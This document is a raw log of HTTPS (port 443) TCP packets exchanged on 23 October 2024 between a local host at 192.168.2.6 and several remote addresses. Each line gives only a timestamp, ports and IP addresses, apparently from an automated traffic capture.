                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.937087059 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.954915047 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.954940081 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.955044985 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.955054045 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.955108881 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.963336945 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.963352919 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.963443041 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.963443041 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.963453054 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.964055061 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.968687057 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.968924999 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.968975067 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.968982935 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969183922 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969238997 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969248056 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969290972 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969321012 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969336987 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969358921 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969388962 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969423056 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969425917 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969429970 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969477892 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969635963 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969680071 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969733953 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969752073 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969803095 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969849110 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.969866991 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.970067024 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.970077038 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.970077038 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.970093966 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.970154047 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.970649958 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.975191116 CEST49741443192.168.2.6142.250.186.68
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.975214958 CEST44349741142.250.186.68192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.978420973 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.978434086 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.011023998 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.011042118 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.026155949 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.031636000 CEST4434986113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.032115936 CEST49861443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.032149076 CEST4434986113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.032625914 CEST49861443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.032638073 CEST4434986113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.040445089 CEST4434986013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.040781975 CEST49860443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.040810108 CEST4434986013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.041234970 CEST49860443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.041241884 CEST4434986013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.050721884 CEST4434986213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.051110029 CEST49862443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.051126957 CEST4434986213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.051475048 CEST49862443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.051481962 CEST4434986213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.055660963 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.055847883 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056039095 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056138992 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056154966 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056206942 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056214094 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056313038 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056375980 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056384087 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056472063 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056534052 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056540966 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056874990 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056895971 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056957006 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056957006 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.056967020 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.057360888 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.073527098 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.073549986 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.073661089 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.073673010 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.073776007 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.073821068 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.073869944 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.073879957 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.073990107 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.081669092 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.081682920 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.081758976 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.081768990 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.086577892 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.086627007 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.086723089 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.086739063 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087018013 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087048054 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087074995 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087076902 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087097883 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087132931 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087147951 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087235928 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087246895 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087970018 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.087995052 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.088016987 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.088031054 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.088044882 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.088079929 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.103090048 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.132693052 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.134895086 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.152175903 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.152203083 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.152261019 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.152271032 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.152363062 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.152363062 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.168004036 CEST4434986113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.168158054 CEST4434986113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.168234110 CEST49861443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.168360949 CEST49861443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.168376923 CEST4434986113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.168390036 CEST49861443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.168395042 CEST4434986113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.171000957 CEST49874443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.171032906 CEST4434987413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.171087980 CEST49874443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.171482086 CEST49874443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.171494961 CEST4434987413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.175503016 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.175535917 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.175580025 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.175739050 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.175760031 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.175832033 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.175832033 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.175843000 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.176444054 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.176598072 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.176604986 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.176773071 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.176915884 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.177222013 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.177819967 CEST4434986013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.177977085 CEST4434986013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.178106070 CEST49860443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.178106070 CEST49860443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.178106070 CEST49860443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.180418015 CEST49875443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.180457115 CEST4434987513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.180521965 CEST49875443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.180632114 CEST49875443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.180644989 CEST4434987513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.189733028 CEST4434986213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.190452099 CEST4434986213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.190522909 CEST49862443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.190804005 CEST49862443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.190804005 CEST49862443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.190821886 CEST4434986213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.190834045 CEST4434986213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.193042994 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.193062067 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.193177938 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.193188906 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.193362951 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.194655895 CEST49876443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.194701910 CEST4434987613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.195045948 CEST49876443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.195586920 CEST49876443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.195604086 CEST4434987613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.200737000 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.200767994 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.200865984 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.200865984 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.200876951 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.200963974 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.203633070 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.203721046 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.203748941 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.203769922 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.203859091 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.203872919 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.203907013 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.204190969 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.204222918 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.204265118 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.204272985 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.204328060 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.204957008 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.204965115 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.205024004 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.238950014 CEST4434986413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.239734888 CEST49864443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.239778042 CEST4434986413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.240058899 CEST49864443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.240067959 CEST4434986413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.241687059 CEST4434986513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.242193937 CEST49865443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.242221117 CEST4434986513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.242599010 CEST49865443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.242605925 CEST4434986513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295257092 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295384884 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295414925 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295523882 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295540094 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295579910 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295695066 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295835972 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295835972 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295850992 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.295922041 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.303471088 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.303774118 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.303781986 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.304241896 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.304604053 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.304681063 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.304747105 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.309860945 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.309884071 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.309946060 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.309993982 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.310005903 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.310098886 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.311513901 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.311528921 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.311580896 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.311618090 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.311626911 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.311768055 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.314888000 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.315109015 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.315156937 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.315663099 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.315990925 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.316802979 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.316903114 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.317065001 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.317085981 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.317132950 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.317260027 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.317411900 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.317444086 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.317476988 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.317928076 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.317990065 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.318142891 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.318569899 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.319097996 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.319113970 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.319195986 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.319196939 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.319206953 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.319258928 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.319549084 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.319721937 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.319942951 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.320585966 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.320647001 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.320708990 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.320836067 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.321089983 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.321146965 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.321477890 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.321561098 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.321568012 CEST49856443192.168.2.6141.193.213.10
